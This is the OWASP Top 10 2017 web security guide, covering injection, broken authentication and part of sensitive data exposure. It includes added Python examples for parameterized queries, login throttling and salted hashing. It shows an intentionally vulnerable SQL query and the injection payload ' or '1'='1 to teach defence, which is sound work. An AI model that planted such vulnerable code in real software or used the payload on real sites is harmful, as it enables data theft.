About OWASP

The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications and application programming interfaces (APIs) that can be trusted.

At OWASP you'll find, free and open:

• Application security standards and tools;

• Complete books on application security testing, secure code development, and secure code review;

• Presentations and videos;

• Cheat sheets on many common topics;

• Standard security controls and libraries;

• Local chapters worldwide;

• Cutting-edge research;

• Extensive conferences worldwide;

• Mailing lists.

Learn more at:

https://www.owasp.org

All OWASP tools, documents, videos, presentations, and chapters are free and open to anyone interested in improving application security.

We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in all of these areas.

OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security.

OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. OWASP produces many kinds of materials in a collaborative, transparent, and open way.

The OWASP Foundation is the non-profit entity that ensures the project's long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP board, chapter leaders, project leaders, and project members.

We support innovative security research with grants and infrastructure.

Come join us!

Copyright and License

Copyright © 2003 - 2017 The OWASP Foundation

This document is released under the Creative Commons Attribution Share-Alike 4.0 license.

For any reuse or distribution, you must make clear to others the license terms of this work.

Foreword

Insecure software is undermining the security of critical infrastructure such as healthcare, defense, energy, and finance. As software becomes increasingly complex and the number of connected devices grows, the importance of application security increases exponentially. The rapid pace of modern software development makes it essential to discover and resolve the most common risks quickly and accurately. We can no longer afford to tolerate relatively simple security problems like those presented in this OWASP Top 10.

A great deal of feedback was received during the creation of the OWASP Top 10 - 2017, far more than for any other OWASP project. This shows how much interest the community has in the OWASP Top 10, and thus how important it is for OWASP to get the Top 10 right for the majority of use cases.

Although the original goal of the OWASP Top 10 project was simply to raise awareness amongst developers and managers, it has become the de facto application security standard.

In this release, issues and recommendations are written concisely and in an accessible way to assist with the adoption of the OWASP Top 10 in application security programs. We encourage large and high-performing organizations that need a true standard to use the OWASP Application Security Verification Standard (ASVS), but for most, the OWASP Top 10 will be sufficient as a start on the application security journey.

We have also written up a range of suggested next steps for different users of the OWASP Top 10, including What's Next for Developers, What's Next for Security Testers, What's Next for Organizations (for CIOs and CISOs), and What's Next for Application Managers (for application managers or anyone responsible for the lifecycle of the application).

In the long term, we encourage all software development teams and organizations to create an application security program that is compatible with their culture and technology. These programs come in all shapes and sizes. To measure and improve the existing application security program in your organization, you can use the Software Assurance Maturity Model (SAMM).

We hope that the OWASP Top 10 is useful to your application security efforts. Questions, comments, and ideas can be submitted at our GitHub project repository:

• https://github.com/OWASP/Top10/issues

The OWASP Top 10 project and its translations can be found here:

• https://www.owasp.org/index.php/top10

Lastly, we wish to thank the founders of the OWASP Top 10 project, Dave Wichers and Jeff Williams, for all their efforts and for believing that this document could be finished with the community's help. Thank you!

• Andrew van der Stock

• Brian Glas

• Neil Smithline

• Torsten Gigler

Project Sponsorship

Thanks to Autodesk for sponsoring the OWASP Top 10 2017. Organizations and individuals that have provided vulnerability prevalence data or other assistance in creating the list are listed on the "Acknowledgements" page.

Introducing the OWASP Top 10 2017!

This major update adds several new risk categories, two of which were selected by the community (A8:2017-Insecure Deserialization and A10:2017-Insufficient Logging and Monitoring). Two key differentiators in the preparation of this release of the OWASP Top 10 are the active feedback from the community and the substantial volume of data received from dozens of organizations, possibly the largest amount ever assembled in the preparation of an application security standard. This gives us confidence that the new OWASP Top 10 addresses the most impactful application security risks currently facing organizations.

The OWASP Top 10 2017 is based primarily on 40+ data sets received from organizations that specialize in application security, and on an industry survey completed by over 500 independent researchers. The data covers vulnerabilities found in hundreds of organizations and over 100,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to this prevalence data, combined with estimates of exploitability, detectability, and impact.

A primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations as a whole about the risks associated with the most common and most significant web application security weaknesses. The Top 10 also provides basic techniques to protect against these risks and guidance on where to go from here.

Roadmap for Future Activities

Don't stop at 10. There are hundreds of issues that could affect the overall security of a web application. They are covered in the OWASP Developer's Guide and the OWASP Cheat Sheet Series, which are essential reading for anyone developing web applications and APIs. Guidance on how to effectively find vulnerabilities in web applications and APIs is provided in the OWASP Testing Guide.

Keep improving. The OWASP Top 10 does not stand still and will continue to change. Even without changing a single line of code, an application may become vulnerable as new attack vectors are discovered and exploitation methods are refined. For more information, please review the advice at the end of the Top 10 in the sections "What's Next for Developers, Security Testers, Organizations, and Application Managers".

Think positive. When you are ready to stop chasing vulnerabilities and focus on building a strong application security program, the OWASP Proactive Controls project provides a starting point for developers, and the OWASP Application Security Verification Standard (ASVS) is a good guide for organizations and application reviewers on what to verify.

Use tools wisely. Vulnerabilities can be complex and deeply buried in code. In most cases, the most effective approach to finding and eliminating security weaknesses is human experts armed with advanced tools. Relying on tools alone is not recommended, as it provides a false sense of security.

Push in every direction. Focus on making security an integral part of your development culture. Find out more in the OWASP Software Assurance Maturity Model (SAMM).


Attribution

We would like to thank the organizations that contributed their vulnerability data to support the 2017 update. We received more than 40 responses to the call for data. For the first time, all the data contributed to a Top 10 release, and the full list of contributors, is publicly available. We believe this is one of the larger, more diverse collections of vulnerability data ever publicly collected.

As there are more contributors than space here, we have created a dedicated page to recognize the contributions made. We wish to give heartfelt thanks to these organizations for being willing to be on the front lines by publicly sharing their vulnerability data with the community. We hope this practice will continue and encourage more organizations to do the same; possibly it will become one of the key milestones of evidence-based security. The OWASP Top 10 would not be possible without the contributions of all these amazing people.

A big thank you to the more than 500 individuals who took the time to complete the industry survey. Your voice helped determine two new additions to the Top 10. We appreciate all the comments, notes of encouragement, and criticism, as well as the time spent, and want to express our gratitude.

We would also like to thank those individuals who contributed significant constructive comments and time reviewing this update to the Top 10. As much as possible, we have listed them on the "Acknowledgements" page.

And finally, we would like to thank in advance all the translators who will translate this release of the Top 10 into numerous different languages, helping to make the OWASP Top 10 more accessible.
What's New

What changed from 2013 to 2017?

Much has changed over the last four years, and the OWASP Top 10 needed to change too. We have completely refactored the OWASP Top 10, revamped the methodology, used a new data call process, worked with the community, re-ordered the risks, rewritten every risk from the ground up, and added references to the most commonly used frameworks and languages.

Over the last few years, the fundamental technology and architecture of applications have changed significantly:

• Microservices written in node.js and Spring Boot are replacing traditional monolithic applications. Microservices come with their own security challenges, such as establishing trust between microservices and containers, secrets management, and so on. Code that was never expected to be reachable from the Internet now sits behind an API or RESTful web service to be consumed by single-page and mobile applications. Architectural assumptions in the code, such as trusted callers, are no longer valid.

• Single-page applications written with JavaScript frameworks (such as Angular and React) allow the creation of highly modular, feature-rich front ends. Client-side functionality that has traditionally been delivered server-side brings its own security challenges.

• JavaScript is now the primary language of the web, with node.js running server-side and modern web frameworks (such as Bootstrap, Electron, Angular, and React) running on the client.

New issues, supported by data:

• A4:2017-XML External Entities (XXE) is a new category, primarily supported by data from static application security testing (SAST) tools.

New issues, supported by the community:

We asked the community to consider two forward-looking weakness categories. After receiving over 500 peer submissions and removing issues already supported by data (such as "Sensitive Data Exposure" and "XML External Entities"), the following categories were selected:

• A8:2017-Insecure Deserialization, which permits remote code execution or sensitive object manipulation.

• A10:2017-Insufficient Logging and Monitoring, the lack of which can prevent detection of malicious activity or breaches, incident response, and digital forensics.

Merged or retired, but not forgotten:

• A4-Insecure Direct Object References and A7-Missing Function Level Access Control were merged into A5:2017-Broken Access Control.

• A8-Cross-Site Request Forgery (CSRF) was found in only 5% of applications, as most frameworks now include CSRF defenses.

• A10-Unvalidated Redirects and Forwards was found in approximately 8% of applications, but was edged out by XML External Entities (XXE).


OWASP Top 10 2013                                               OWASP Top 10 2017
A1 - Injection                                                  A1:2017-Injection
A2 - Broken Authentication and Session Management               A2:2017-Broken Authentication
A3 - Cross-Site Scripting (XSS)                                 A3:2017-Sensitive Data Exposure
A4 - Insecure Direct Object References [merged with A7]         A4:2017-XML External Entities (XXE) [New]
A5 - Security Misconfiguration                                  A5:2017-Broken Access Control [Merged]
A6 - Sensitive Data Exposure                                    A6:2017-Security Misconfiguration
A7 - Missing Function Level Access Control [merged with A4]     A7:2017-Cross-Site Scripting (XSS)
A8 - Cross-Site Request Forgery (CSRF)                          A8:2017-Insecure Deserialization [New, Community]
A9 - Using Components with Known Vulnerabilities                A9:2017-Using Components with Known Vulnerabilities
A10 - Unvalidated Redirects and Forwards                        A10:2017-Insufficient Logging and Monitoring [New, Community]

The two columns list the categories in rank order; the arrows of the original diagram map them as follows: 2013 A1, A2, and A9 keep their positions; 2013 A3 (XSS) moves to A7:2017; 2013 A5 moves to A6:2017; 2013 A6 moves to A3:2017; 2013 A4 and A7 merge into A5:2017; 2013 A8 (CSRF) and A10 (Unvalidated Redirects and Forwards) are retired.
Risks

Application Security Risks

What are application security risks?

Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.

[Figure: the path from Threat Agents through Attack Vectors and Security Weaknesses (some of them blocked by Security Controls) to Technical Impacts and Business Impacts on assets and functions. The original diagram shows several attack vectors, weaknesses, controls, and impacts side by side.]

Sometimes these paths are trivial to find and exploit, and sometimes they are extremely difficult. Similarly, the harm caused may be of no consequence, or it may put you out of business. To determine the risk to your organization, evaluate the likelihood associated with each threat agent, attack vector, and security weakness, and combine it with an estimate of the technical and business (reputational) impact to your organization. Together, these factors determine the overall risk.

What's my risk?

The OWASP Top 10 focuses on identifying the most serious web application security risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the OWASP Risk Rating Methodology.

Threat Agents  | Exploitability | Weakness Prevalence | Weakness Detectability | Technical Impacts | Business Impacts
App Specific   | Easy: 3        | Widespread: 3       | Easy: 3                | Severe: 3         | Business Specific
               | Average: 2     | Common: 2           | Average: 2             | Moderate: 2       |
               | Difficult: 1   | Uncommon: 1         | Difficult: 1           | Minor: 1          |

In this edition, we have updated the risk rating system to make it easier to calculate the likelihood and possible impact of any given risk. For more details, please see the section on risks.

Each organization is unique, and so are the threat actors for that organization, their goals, and the impact of any breach. If one organization uses a content management system (CMS) to publish news and a health system uses the same CMS to store medical records, the threats and risks for these organizations will be very different. It is critical to determine the risk to your organization based on the threat agents applicable to it and the possible business impacts of an attack.

Where possible, the names of the risks in the Top 10 are aligned with CWE weakness names to promote generally accepted naming conventions and to reduce confusion.

References

OWASP

• OWASP Risk Rating Methodology

• Article on Threat/Risk Modeling

External

• ISO 31000: Risk Management

• ISO 27001: Information Security Management

• NIST Cyber Security Framework (US)

• Cyber attack mitigation strategies (AU)

• NIST CVSS 3.0

• Microsoft Threat Modelling Tool
OWASP Top 10

Application Security Risks - 2017

A1:2017-Injection
Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

A2:2017-Broken Authentication
Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities temporarily or permanently.

A3:2017-Sensitive Data Exposure
Many web applications and APIs do not properly protect sensitive financial, healthcare, or personal data. Attackers may steal or modify such data and then conduct credit card fraud, identity theft, or other crimes. Sensitive data requires extra protection, such as encryption at rest or in transit, and special precautions when exchanged with the browser.

A4:2017-XML External Entities (XXE)
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, access internal file shares, perform internal port scanning, execute code remotely, and mount denial of service attacks.

A5:2017-Broken Access Control
Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to gain unauthorized access to other users' accounts or to sensitive information, and to modify other users' data or access rights.

A6:2017-Security Misconfiguration
Security misconfiguration is the most commonly seen issue. It is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, they must also be patched and upgraded in a timely fashion.

A7:2017-Cross-Site Scripting (XSS)
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data that contains HTML or JavaScript using a browser API. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

A8:2017-Insecure Deserialization
Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.

A9:2017-Using Components with Known Vulnerabilities
Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can lead to serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable serious consequences.

A10:2017-Insufficient Logging and Monitoring
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, hide their presence, pivot to more systems, and tamper with, extract, or destroy data. Breaches are typically detected only after more than 200 days, and usually by external parties rather than by internal checks or monitoring.
A1:2017-Injection

Threat Agents / Attack Vectors: application specific; Exploitability: 3
Security Weakness: Prevalence: 2; Detectability: 3
Impacts: Technical: 3; Business: ?

Attack vectors. Almost any source of data can be an injection vector: environment variables, parameters, external and internal web services, and all types of users. Injection flaws occur when an attacker can send hostile data to an interpreter.

Security weakness. Injection flaws are very prevalent, particularly in legacy code. Injection vulnerabilities are often found in SQL, LDAP, XPath, or NoSQL queries, OS commands, XML parsers, SMTP headers, expression languages, and ORM queries. Injection flaws are easy to discover when examining code. Scanners and fuzzers can help attackers find them.

Impacts. Injection can result in data loss, corruption, or disclosure to unauthorized parties, as well as denial of service. In some cases injection can lead to complete host takeover. The business impact depends on the criticality of the application and its data.


Is the Application Vulnerable?

An application is vulnerable to attack when:

• User-supplied data is not validated, filtered, or sanitized by the application;

• Dynamic queries or non-parameterized calls without context-aware escaping are used directly in the interpreter;

• Hostile data is used within object-relational mapping (ORM) search parameters to extract additional, sensitive records;

• Hostile data is directly used or concatenated, such that the SQL code or command contains both structure and hostile data in dynamic queries, commands, or stored procedures.

Some of the more common injections are SQL, NoSQL, ORM, LDAP, EL, or OGNL injection, as well as OS command injection. The concept is identical for all interpreters. Source code review is the best method of detecting injections, closely followed by thorough automated testing of all input parameters, headers, URLs, cookies, and JSON, SOAP, and XML data. Organizations can also include static (SAST) and dynamic (DAST) application security testing in the continuous integration and deployment (CI/CD) pipeline to identify newly introduced vulnerabilities prior to production deployment.


Example Attack Scenarios

Scenario #1: An application uses untrusted data in the construction of the following vulnerable SQL call:

    String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";

Scenario #2: Similarly, an application's blind trust in frameworks may result in queries that are still vulnerable (e.g., in Hibernate Query Language, HQL):

    Query HQLQuery = session.createQuery("FROM accounts WHERE custID='" + request.getParameter("id") + "'");

In both cases, the attacker modifies the value of the "id" parameter in their browser to send: ' or '1'='1. For example:

    http://example.com/app/accountView?id=' or '1'='1

This changes the meaning of both queries so that they return all the records from the accounts table. More dangerous attacks could modify or delete data, or even invoke stored procedures.


How to Prevent

Preventing injection requires keeping data separate from commands and queries.

• The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface, or to migrate to Object Relational Mapping (ORM) tools.

Note: Even when parameterized, stored procedures can still introduce SQL injection if PL/SQL or T-SQL concatenates queries and data, or executes hostile data with EXECUTE IMMEDIATE or exec().

• Use positive ("whitelist") server-side input validation. This is not a complete defense, as many applications require special characters, for example in text areas or in APIs for mobile applications.

• For any residual dynamic queries, escape special characters using the specific escape syntax for that interpreter.

Note: SQL structure such as table names and column names cannot be escaped, and thus user-supplied structure names are dangerous. This is a common issue in report-writing software.

• Use LIMIT and other SQL controls within queries to prevent mass disclosure of records in case of SQL injection.
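The scenarios above and the defenses in this list, reproduced as an added example (editor's code, not part of the OWASP Top 10 document) against an in-memory SQLite database. The accounts table is constructed sample data; the allow-list of sort columns is an assumption for the example. The vulnerable function is Scenario #1 ported from Java to Python; the other three functions show the parameterized query, interpreter-specific escaping for a residual dynamic query, and the allow-list that SQL structure (a column name) requires because it can be neither bound nor escaped.

```python
import sqlite3

# Example added by the editor; not code from the OWASP Top 10 document.

def make_db():
    """Constructed sample data: the 'accounts' table the scenario queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT PRIMARY KEY, owner TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                     [("1001", "alice", 120), ("1002", "bob", 75), ("1003", "carol", 9000)])
    return conn

PAYLOAD = "' or '1'='1"   # the value the attacker puts in the 'id' parameter

def account_view_vulnerable(conn, cust_id):
    """Scenario #1: the request parameter is concatenated into the SQL text, so the
    payload becomes part of the query structure and the WHERE clause is always true."""
    query = "SELECT custID, owner, balance FROM accounts WHERE custID='" + cust_id + "'"
    return conn.execute(query).fetchall()

def account_view_parameterized(conn, cust_id):
    """Preferred fix: a parameterized query. The driver binds the value separately
    from the SQL structure, so the payload is just a string that matches no row.
    LIMIT 1 bounds disclosure should anything else go wrong."""
    query = "SELECT custID, owner, balance FROM accounts WHERE custID=? LIMIT 1"
    return conn.execute(query, (cust_id,)).fetchall()

def escape_sql_literal(value):
    """Residual dynamic SQL: interpreter-specific escaping. In SQLite/ANSI SQL the
    only character that terminates a single-quoted literal is the quote itself,
    escaped by doubling it. This works for values only, never for identifiers."""
    return value.replace("'", "''")

def account_view_escaped(conn, cust_id):
    query = ("SELECT custID, owner, balance FROM accounts WHERE custID='"
             + escape_sql_literal(cust_id) + "'")
    return conn.execute(query).fetchall()

ALLOWED_SORT_COLUMNS = {"owner", "balance"}   # assumed allow-list for this example

def list_accounts_sorted(conn, sort_col):
    """SQL structure (here a column name) cannot be escaped or bound as a
    parameter; the only safe option is a positive allow-list."""
    if sort_col not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column")
    return conn.execute("SELECT custID FROM accounts ORDER BY " + sort_col).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(account_view_vulnerable(db, PAYLOAD))      # all three rows: the injection succeeded
    print(account_view_parameterized(db, PAYLOAD))   # []: the payload is treated as a literal ID
    print(account_view_escaped(db, PAYLOAD))         # []: the quote is doubled, still a literal
    print(list_accounts_sorted(db, "balance"))       # [('1002',), ('1001',), ('1003',)]
```

The escaping variant is shown only because the list above allows it as a last resort: it depends on knowing every metacharacter of the specific interpreter, which is why the parameterized form is the one to reach for first.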

OWASP References

• OWASP Proactive Controls: Parameterize Queries

• OWASP Application Security Verification Standard (ASVS): V5 Input Validation and Encoding

• OWASP Testing Guide: SQL Injection, Command Injection, ORM Injection

• OWASP Cheat Sheet: Injection Prevention

• OWASP Cheat Sheet: SQL Injection Prevention

• OWASP Cheat Sheet: Injection Prevention in Java

• OWASP Cheat Sheet: Query Parameterization

• OWASP Automated Threats to Web Applications - OAT-014

External

• CWE-77: Command Injection

• CWE-89: SQL Injection

• CWE-564: Hibernate Injection

• CWE-917: Expression Language Injection

• PortSwigger: Server-side template injection
A2:2017-Broken Authentication

Threat Agents / Attack Vectors: application specific; Exploitability: 3
Security Weakness: Prevalence: 2; Detectability: 2
Impacts: Technical: 3; Business: ?

Attack vectors. Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, and tools for automated brute force and dictionary attacks. Session management attacks are well understood, particularly in relation to unexpired session tokens.

Security weakness. Broken authentication is widespread due to the design and implementation of most identity and access controls. Session management is the bedrock of authentication and access control and is present in all stateful applications. Attackers can detect broken authentication manually and exploit it using automated tools, password lists, and dictionary attacks.

Impacts. Attackers have to gain access to only a few ordinary accounts, or just one admin account, to compromise the system. Depending on the domain of the application, this may allow money laundering, social security fraud, or identity theft, or disclose legally protected, highly sensitive information.


Is the Application Vulnerable?

Confirmation of the user's identity, authentication, and session management are critical to protect against authentication-related attacks.

There may be authentication weaknesses if the application:

• Permits automated attacks such as credential stuffing, where the attacker has a list of valid usernames and passwords;

• Permits brute force or other automated attacks;

• Permits default, weak, or well-known passwords, such as "Password1" or "admin/admin";

• Uses weak or ineffective credential recovery and forgot-password processes, such as "knowledge-based answers", which cannot be made safe;

• Uses plain text, encrypted, or weakly hashed passwords (see A3:2017-Sensitive Data Exposure);

• Has missing or ineffective multi-factor authentication;

• Exposes session IDs in the URL (e.g., URL rewriting);

• Does not rotate session IDs after successful login;

• Does not properly invalidate session IDs. User sessions or authentication tokens (particularly single sign-on (SSO) tokens) are not properly invalidated during logout or after a period of inactivity.


How to prevent


Where possible, implement multi-factor authentication to prevent automated attacks, credential stuffing, brute force and the reuse of stolen credentials.

Do not ship or deploy with default credentials, particularly for administrative users.

Implement weak-password checks, for example by testing new or changed passwords against the list of the "10,000 worst passwords".

Align password length, complexity and rotation policies with NIST 800-63B section 5.1.1 "Memorized Secrets" or another modern, evidence-based password policy.

Harden registration, credential recovery and API paths against account enumeration attacks by using the same messages in all responses.

Limit or increasingly delay failed login attempts. Log all failures and alert administrators when credential stuffing, brute force or other attacks are detected.

Use a server-side, secure, built-in session manager that generates a new random session identifier with high entropy after login. Session identifiers must not appear in the URL; they must be stored securely and invalidated after logout, idle and absolute timeouts.
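The login flow these recommendations describe, as an added example that is not part of the original document: stored passwords are salted, iterated PBKDF2 verifiers rather than plain text; every failure returns the same message so accounts cannot be enumerated; failed attempts are delayed with exponential backoff and logged for alerting; each successful login issues a fresh high-entropy session identifier, and logout invalidates it server-side. The in-memory user store, the user name, the iteration count and the delay values are constructed assumptions; a real deployment keeps the store and the failure counters in a database shared by all application instances.

```python
import hashlib
import hmac
import os
import secrets
import time

ITERATIONS = 100_000          # PBKDF2 work factor; raise as hardware gets faster
GENERIC_FAILURE = "Invalid username or password."   # one message for every failure


def make_verifier(password, salt=None):
    """Salted, iterated hash of a password; this is what gets stored, never the password."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"salt": salt, "digest": digest}


# Constructed in-memory user store standing in for a database (assumption).
USERS = {"alice": make_verifier("correct horse battery staple")}


class LoginService:
    def __init__(self, base_delay=1.0, max_delay=300.0, clock=time.time):
        self.failures = {}     # username -> (failure count, earliest next attempt)
        self.audit_log = []    # every failed attempt, for alerting on brute force
        self.sessions = {}     # session id -> username
        self.base_delay = base_delay
        self.max_delay = max_delay
        self.clock = clock     # injectable so tests can control time

    def _record_failure(self, username, reason):
        count, _ = self.failures.get(username, (0, 0.0))
        count += 1
        # Exponential backoff between attempts: 1s, 2s, 4s, ... capped at max_delay.
        delay = min(self.base_delay * 2 ** (count - 1), self.max_delay)
        self.failures[username] = (count, self.clock() + delay)
        self.audit_log.append({"user": username, "reason": reason, "at": self.clock()})

    def login(self, username, password):
        """Return (session_id, None) on success or (None, GENERIC_FAILURE) otherwise."""
        _, not_before = self.failures.get(username, (0, 0.0))
        if self.clock() < not_before:
            self._record_failure(username, "throttled")
            return None, GENERIC_FAILURE
        record = USERS.get(username)
        if record is None:
            # Do the same amount of work for unknown users so response timing
            # does not reveal which user names exist.
            hashlib.pbkdf2_hmac("sha256", password.encode(), b"\x00" * 16, ITERATIONS)
            self._record_failure(username, "unknown user")
            return None, GENERIC_FAILURE
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), record["salt"], ITERATIONS)
        if not hmac.compare_digest(candidate, record["digest"]):
            self._record_failure(username, "wrong password")
            return None, GENERIC_FAILURE
        self.failures.pop(username, None)
        # A new random, high-entropy session id on every successful login, so an
        # id chosen before login (session fixation) is never carried over.
        session_id = secrets.token_urlsafe(32)
        self.sessions[session_id] = username
        return session_id, None

    def logout(self, session_id):
        """Invalidate server-side; the cookie alone must not keep the session alive."""
        return self.sessions.pop(session_id, None) is not None

    def repeated_failures(self, threshold=5):
        """User names whose failure count reached the alerting threshold."""
        return sorted(u for u, (count, _) in self.failures.items() if count >= threshold)
```

Because the unknown-user branch still runs the key derivation and returns the same text as a wrong password, neither the message nor the timing tells a credential-stuffing tool which names are valid; the throttle state and the audit log are what an administrator alert would be built on.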


Example attack scenarios

Scenario #1: Credential stuffing, an attack on accounts using lists of known passwords, is very common. If the application does not protect against automated attacks or credential stuffing, it can be used to determine whether credentials are valid.

Scenario #2: Most authentication attacks occur because passwords are used as the only factor. Once considered best practice, password rotation and complexity requirements encourage users to use and reuse weak passwords. Organizations are recommended to stop these practices (see NIST 800-63) and to use multi-factor authentication.

Scenario #3: Application session timeouts are not set correctly. A user uses a public computer to access the application and, instead of selecting "logout", simply closes the browser tab and walks away. An attacker uses the same browser an hour later, and the user is still authenticated.


References

OWASP

• OWASP Proactive Controls: Implement Identity and Authentication Controls

• OWASP Application Security Verification Standard (ASVS): V2 Authentication, V3 Session Management

• OWASP Testing Guide: Identity, Authentication

• OWASP Cheat Sheet: Authentication

• OWASP Cheat Sheet: Credential Stuffing

• OWASP Cheat Sheet: Forgot Password

• OWASP Cheat Sheet: Session Management

• OWASP Automated Threats Handbook

External

• NIST 800-63b: 5.1.1 Memorized Secrets

• CWE-287: Improper Authentication

• CWE-384: Session Fixation
A3:2017 Sensitive Data Exposure


Attack vectors: Rather than attacking cryptography directly, attackers steal keys, execute man-in-the-middle attacks or obtain clear-text data from the server, while in transit or from the user's client, for example the browser. Such attacks are usually carried out manually. Previously retrieved password databases can be brute forced using graphics processing units (GPUs).

Security weakness: Over the last few years this has been the most common and most impactful attack. The most common flaw is simply not encrypting sensitive data; where cryptography is employed, weak algorithms, protocols and ciphers, weak password-hashing storage techniques and weak key generation and management are common. Server-side weaknesses are easy to detect for data in transit but hard to detect for data at rest.

Impacts: Failure frequently compromises all personal data (health records, credentials, credit card data) that must be protected by law, for example under the EU General Data Protection Regulation (GDPR) or local privacy laws.


Is the application vulnerable?

First determine the protection needs of data in transit and at rest. For example, passwords, credit card numbers, health records, personal information and business secrets require extra protection, particularly if they fall under privacy laws (e.g. the EU General Data Protection Regulation (GDPR)) or financial data protection regulations (e.g. the Payment Card Industry Data Security Standard (PCI DSS)).

• Is any data transmitted in clear text? This concerns protocols such as HTTP, SMTP and FTP. External Internet traffic is especially dangerous. Verify all internal traffic, for example between load balancers, web servers and back-end systems.

• Are stores of sensitive data, including backups, encrypted?

• Are old or weak cryptographic algorithms in use, either by default or in older versions?

• Are default, weak or reused cryptographic keys in use, and are proper key management and rotation mechanisms in place?

• Is encryption not enforced, for example are user agent (browser) security directives or headers missing?

• Does the user agent (e.g. an application or mail client) verify that the received server certificate is valid?

See the Application Security Verification Standard: Cryptography (V7), Data Protection (V9) and SSL/TLS (V10).


How to prevent


Do the following, at a minimum, and consult the material in the "References" section:

• Classify the data processed, stored or transmitted by the application. Identify which data is sensitive according to privacy laws, regulatory requirements or business needs.

• Apply controls as per the classification.

• Do not store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS-compliant tokenization or truncation. Data that is not retained cannot be stolen.

• Make sure all sensitive data at rest is encrypted.

• Ensure up-to-date and strong standard algorithms, protocols and keys are in place, and use proper key management.

• Encrypt all data in transit with a secure protocol such as TLS with perfect forward secrecy (PFS), cipher prioritization by the server and secure parameters. Enforce encryption using directives such as HTTP Strict Transport Security (HSTS).

• Disable caching for responses that contain sensitive data.

• Store passwords using strong adaptive and salted hashing functions with a work factor (delay factor), such as Argon2, scrypt, bcrypt or PBKDF2.

• Verify independently the effectiveness of configuration and settings.
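The difference between the password storage the last bullet requires and the unsalted, fast hashing that Scenario #3 below describes, as an added example that is not part of the original document: a tiny precomputed table of SHA-256 values stands in for a rainbow table and recovers an unsalted hash instantly, while salted PBKDF2 records for the same password differ from each other and never match the table. The weak-password list, the record format and the iteration count are constructed assumptions; a production system would use a library-provided encoding and a work factor tuned to its hardware.

```python
import hashlib
import hmac
import os

# Constructed tiny "rainbow table": precomputed SHA-256 of a few weak passwords,
# standing in for the multi-gigabyte tables used against real leaks.
WEAK_PASSWORDS = ["Password1", "123456", "qwerty", "admin"]
RAINBOW_TABLE = {hashlib.sha256(p.encode()).hexdigest(): p for p in WEAK_PASSWORDS}

ITERATIONS = 200_000     # PBKDF2 work factor; raise over time (see needs_rehash)


def fast_unsalted_hash(password):
    """What Scenario #3 warns about: one deterministic, fast hash per password.
    Two users with the same password get the same hash, and the hash is
    precomputable."""
    return hashlib.sha256(password.encode()).hexdigest()


def crack_with_table(hexdigest):
    """Lookup is O(1): any unsalted SHA-256 of a listed password is recovered at once."""
    return RAINBOW_TABLE.get(hexdigest)


def store_password(password, iterations=ITERATIONS):
    """Salted, iterated hash; the encoded record is what the database stores.
    Record layout (constructed): algorithm$iterations$salt_hex$digest_hex."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported record")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def needs_rehash(stored, minimum=ITERATIONS):
    """True when a record was created with a weaker work factor than current policy;
    re-store the password on the user's next successful login."""
    return int(stored.split("$")[1]) < minimum


def stored_digest(stored):
    """The digest part of a record, to show it never matches a precomputed table."""
    return stored.split("$")[3]
```

Because the salt is random per record, an attacker who obtains the database cannot reuse work across users or across leaks, and the iteration count multiplies the cost of every guess, which is exactly what the GPU-based cracking in Scenario #3 relies on being cheap.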


Example attack scenarios

Scenario #1: An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text.

